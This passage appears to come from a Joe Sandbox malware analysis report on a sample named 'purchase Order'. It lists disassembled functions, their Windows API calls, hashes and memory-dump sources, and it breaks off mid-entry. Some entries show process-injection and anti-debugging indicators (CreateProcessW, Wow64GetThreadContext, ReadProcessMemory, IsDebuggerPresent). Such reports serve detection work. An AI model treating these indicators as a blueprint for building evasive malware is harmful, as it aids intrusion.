Opcode Fuzzy Hash: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
Instruction Fuzzy Hash: 03E012A164175157DA3475796E84EB713CC4F0435671C0C1DB86AE7146DF24FD4096AC

Function 00C42322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 00C422A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00C424F1), ref: 00C42303

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C425A1
CoInitialize.OLE32(00000000), ref: 00C42618
CloseHandle.KERNEL32(00000000), ref: 00CB503A

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 3815369404-0
Opcode ID: ad9b605d507f876e56c83b731e7dad1432b5c4d45878aabab774c175c716798d
Instruction ID: cae55e2420fac29bb88cd9b82ab423429e5133d408ad7c142b42d45dcce103e5
Opcode Fuzzy Hash: ad9b605d507f876e56c83b731e7dad1432b5c4d45878aabab774c175c716798d
Instruction Fuzzy Hash: DC717DBC9013858BC704EF6AAD96799BBE4BB99344790426EE10EC77B1CB704444DF39

Function 00C43A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00C43A73

Part of subcall function 00C61405: __lock.LIBCMT ref: 00C6140B

Part of subcall function 00C43ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C43AF3
Part of subcall function 00C43ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C43B08

Part of subcall function 00C43D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00C43AA3,?), ref: 00C43D45
Part of subcall function 00C43D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00C43AA3,?), ref: 00C43D57
Part of subcall function 00C43D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00D01148,00D01130,?,?,?,?,00C43AA3,?), ref: 00C43DC8
Part of subcall function 00C43D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00C43AA3,?), ref: 00C43E48

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C43AB3

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
String ID:
API String ID: 924797094-0
Opcode ID: 6432a7b3efb325c65a31047b869817b4c6a7007ddca05bbc5dea87f87e9c435f
Instruction ID: 3e6472558e95510267b5cef6ae486cebc2e1915a9e3e1ba21e86f3a3c40fb744
Opcode Fuzzy Hash: 6432a7b3efb325c65a31047b869817b4c6a7007ddca05bbc5dea87f87e9c435f
Instruction Fuzzy Hash: 7D1190759043419FD300EF65E845A1EFBE9FB94750F00891EF889C72A1DB709584DBA2

Function 00C6E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 00C6EA29
__close_nolock.LIBCMT ref: 00C6EA42

Part of subcall function 00C67BDA: __getptd_noexit.LIBCMT ref: 00C67BDA

Part of subcall function 00C67C0E: __getptd_noexit.LIBCMT ref: 00C67C0E

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle__close_nolock
String ID:
API String ID: 1046115767-0
Opcode ID: 057ef0ab9b9fb6e554f553e334acfe6dc3fe1512530245e55c7b2339550ddd0f
Instruction ID: 2787db7736f63988ac9b263c3d84cca93a876db254064e5f84c575ce3aa25049
Opcode Fuzzy Hash: 057ef0ab9b9fb6e554f553e334acfe6dc3fe1512530245e55c7b2339550ddd0f
Instruction Fuzzy Hash: AD11C2768056109BD731BFA4D8C53587EA16F81335F2A0741E4745F2E3CBB48940BAA5

Function 00C5F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00C6395C: __FF_MSGBANNER.LIBCMT ref: 00C63973
Part of subcall function 00C6395C: __NMSG_WRITE.LIBCMT ref: 00C6397A
Part of subcall function 00C6395C: RtlAllocateHeap.NTDLL(015C0000,00000000,00000001,00000001,00000000,?,?,00C5F507,?,0000000E), ref: 00C6399F

std::exception::exception.LIBCMT ref: 00C5F51E
__CxxThrowException@8.LIBCMT ref: 00C5F533

Part of subcall function 00C66805: RaiseException.KERNEL32(?,?,0000000E,00CF6A30,?,?,?,00C5F538,0000000E,00CF6A30,?,00000001), ref: 00C66856

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 1cb021df49e4bc4e78af391ed25a954eb2345ea95811cda5381dd6e0eb85ec45
Instruction ID: 66c2f5eff6d2465544e35ed2d2427395cb7c13d48a06fdee2a2a1ed75113f310
Opcode Fuzzy Hash: 1cb021df49e4bc4e78af391ed25a954eb2345ea95811cda5381dd6e0eb85ec45
Instruction Fuzzy Hash: 7EF0F47500020D67DB19BFA9D841AEE77AC9F00314F60443DFE0992181DBB0D7C5A6A9

Function 00C635E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C67C0E: __getptd_noexit.LIBCMT ref: 00C67C0E

__lock_file.LIBCMT ref: 00C63629

Part of subcall function 00C64E1C: __lock.LIBCMT ref: 00C64E3F

__fclose_nolock.LIBCMT ref: 00C63634

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 3cac8c6a2425ac8fdd59d15cbe8e6ba852722e9b6d7f87c8c9406b05afaa4aac
Instruction ID: 6d00d2b10b52eeb54c66e7608dc9f4c6286b8e17e56c31a1b04f9a73a203d9a6
Opcode Fuzzy Hash: 3cac8c6a2425ac8fdd59d15cbe8e6ba852722e9b6d7f87c8c9406b05afaa4aac
Instruction Fuzzy Hash: 71F0B471901644AAD731BB69C88676EBAA07F40734F258218F421AB2D1CB7CCB01BB95

Function 017CC0F5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 017CC8B3
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 017CC949
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 017CC96B

Memory Dump Source

Source File: 00000000.00000002.1397127404.00000000017CA000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17ca000_purchase Order.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction ID: 08816f3c9f658732d75e774d79459d3de6ca33eede426ab558c716461c301c58
Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction Fuzzy Hash: 4212CC24E24658C6EB24DF64D8507DEB232EF68700F1090ED910DEB7A5E77A4F81CB5A

Function 00C62957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 00C62A0B

Part of subcall function 00C67C0E: __getptd_noexit.LIBCMT ref: 00C67C0E

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: __flush__getptd_noexit
String ID:
API String ID: 4101623367-0
Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction ID: b150d7c57ecb4f1d1c41054e5b082d575af0cde109452846a5665a06d2475448
Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction Fuzzy Hash: A9418671700F069FDB388EA9C8C15AE77A6EF84360B24853DE865C7285D6B4DE41AB40

Function 00C5ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00C5EDC7

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: ec5f98eaaf87736565ed84690982746aa4380abd89ee2cfa2e60d15b78105e83
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: F9310578A00105DBC718DF19C480A69FBB2FF59341B6486A5E819CB256DB30EFC5CF84

Function 00CA040F Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00CA0519

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 8a5eecab0e0eade9622ad4d2b617e3de1f355d2fb6368f4793e174e3f97f1a21
Instruction ID: 71ff4d9d069a5be9fe73dc4a22eea14bd1f61387a803ca901a1579e8d437668f
Opcode Fuzzy Hash: 8a5eecab0e0eade9622ad4d2b617e3de1f355d2fb6368f4793e174e3f97f1a21
Instruction Fuzzy Hash: 0331C079604529DFCB01AF01C0806AE7BB0FF4A364F20844AEA961B386EB70A945DF85

Function 00CB9A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00CB9A80

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 27be64c3d89293424a5bf371b888274eae54ee574e778dddd6886fdd72f3d041
Instruction ID: c02469b6d61d4cea31aad8505ad0600141c4b3a2ee97ee9b2ef780510e0ef44d
Opcode Fuzzy Hash: 27be64c3d89293424a5bf371b888274eae54ee574e778dddd6886fdd72f3d041
Instruction Fuzzy Hash: 53415F745046118FDB24CF15C444B1ABBF0BF45305F29896CE9A64B362D372F88ADF56

Function 00C441A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C44214: FreeLibrary.KERNEL32(00000000,?), ref: 00C44247

LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00C439FE,?,00000001), ref: 00C441DB

Part of subcall function 00C44291: FreeLibrary.KERNEL32(00000000), ref: 00C442C4

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Library$Free$Load
String ID:
API String ID: 2391024519-0
Opcode ID: 0aded7f5263bae69bd16d8195da98cbff14668505ef3f0fb6536ba256d91a067
Instruction ID: 8b283c68807e327daa50180208fb1ef4a487978e516608b91ff63e03928f1dc3
Opcode Fuzzy Hash: 0aded7f5263bae69bd16d8195da98cbff14668505ef3f0fb6536ba256d91a067
Instruction Fuzzy Hash: 7811A731700305AADB28BF74DC06FAE77A9AF40711F208429F596A71C1DEB0DA01AB60

Function 00CB9B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00CB9B51

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: aae58b7fa131a5bdc047be7c19c7c0b9ce574914e186ebea0ba711dd47149658
Instruction ID: ff59c71b7c3db4571c4695e98d5dd4b34d5289367070eeaa43cc2e2fc61e866e
Opcode Fuzzy Hash: aae58b7fa131a5bdc047be7c19c7c0b9ce574914e186ebea0ba711dd47149658
Instruction Fuzzy Hash: 18216974508601CFDB24DF64C444B1ABBF1BF85305F25496CEAAA87222D731F88ADF56

Function 00C6AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 00C6AFC0

Part of subcall function 00C67BDA: __getptd_noexit.LIBCMT ref: 00C67BDA

Part of subcall function 00C67C0E: __getptd_noexit.LIBCMT ref: 00C67C0E

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle
String ID:
API String ID: 1144279405-0
Opcode ID: 00e87dd9d030e925fff851a99c767c483d4b7cf52c35dab6daac6e3349dad926
Instruction ID: 52e4e4e84bf6ab534389aa7bbfc6223f2050d992c3fd152c0cf7b824b1d11e81
Opcode Fuzzy Hash: 00e87dd9d030e925fff851a99c767c483d4b7cf52c35dab6daac6e3349dad926
Instruction Fuzzy Hash: 8911C4B28056009FD7327FA4D8C57697FA0AF81335F294740E5349F1E2C7B58D40ABA2

Function 00C439DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
Instruction ID: f7d254faf067a59d7f7a4c9317a8116a8f6b1804191f3b2ac557c89879c5e14e
Opcode Fuzzy Hash: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
Instruction Fuzzy Hash: AA013131500109AECF15EFA4C8928FEBB74BF21344F148029F566A71A5EA309B49EB60

Function 00C62AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00C62AED

Part of subcall function 00C67C0E: __getptd_noexit.LIBCMT ref: 00C67C0E

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: cafe9fd284856a88727a401a456ec64fa463bb807d3e2ca2274d30acd1808b2b
Instruction ID: 6f07aa9b6555713ee6110ca26ce597c63590fdfa010e6849440908d09b78a869
Opcode Fuzzy Hash: cafe9fd284856a88727a401a456ec64fa463bb807d3e2ca2274d30acd1808b2b
Instruction Fuzzy Hash: 0EF0F031900609EBDF32AFB48C8639F3AA1BF40320F148415F4209B192C7B98A22FB81

Function 00C44252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,?,?,00C439FE,?,00000001), ref: 00C44286

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 2be3e73272bfb7cf669e6149f5336046bbcc32b053d30b87df34b43b3c339879
Instruction ID: bec96efa06d9e4149cab676bb5f300b9594a4c8f0fe0787c777814614440ac3f
Opcode Fuzzy Hash: 2be3e73272bfb7cf669e6149f5336046bbcc32b053d30b87df34b43b3c339879
Instruction Fuzzy Hash: F6F01571909702CFCB389F65D890A16BBE4BF043253248A3EF1E682611C7B29A80DB50

Function 00C440A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C440C6

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: dc0e1824f15b06cf328402f1a63f5b3b450ce126e9786d89ad67794126a44b63
Instruction ID: c689f7bfc3a44ed2309f583c1664df82f55a5acb0ffe266911e2df433c1acf38
Opcode Fuzzy Hash: dc0e1824f15b06cf328402f1a63f5b3b450ce126e9786d89ad67794126a44b63
Instruction Fuzzy Hash: DDE0CD365002245BC7119654DC46FEE779DDF8D6A0F0900B5F905D7244DA6499819691

Function 017CD0F8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 017CD109

Memory Dump Source

Source File: 00000000.00000002.1397127404.00000000017CA000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17ca000_purchase Order.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 4c95db64fb3a79f4f5721990bf38fc815fab266a2bf1d555c2b135a4843038ad
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 30E0E67494010DDFDB00DFF4D54969D7BF4EF04701F100165FD01D2281D6319D508A62

Non-executed Functions

Function 00CAAACE Relevance: 61.8, APIs: 33, Strings: 2, Instructions: 574windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00CAB1CD

Strings

@U=u, xrefs: 00CAAB64, 00CAABB8, 00CAAC6B, 00CAACB2, 00CAACDA, 00CAAE3F, 00CAAEDA, 00CAAF24, 00CAAF6E, 00CAAF8E, 00CAB07A, 00CAB0B3, 00CAB104, 00CAB16F, 00CAB1CD
%d/%02d/%02d, xrefs: 00CAAEFC

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d$@U=u
API String ID: 3850602802-2764005415
Opcode ID: 763d1a7f73f0b0e8f39e26d92dbf56d2577a79d1f104b8d41112650ebf1ea577
Instruction ID: 7d8110da8a96d28b0703ed621ac33bf1b3490baf3923e01c0e7481eace84ae8d
Opcode Fuzzy Hash: 763d1a7f73f0b0e8f39e26d92dbf56d2577a79d1f104b8d41112650ebf1ea577
Instruction Fuzzy Hash: 2E12C17150021AAFEB259F65CC49FAE7BB8FF46718F104129FA16DB2D1DB708A41CB11

Function 00C5EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000), ref: 00C5EB4A
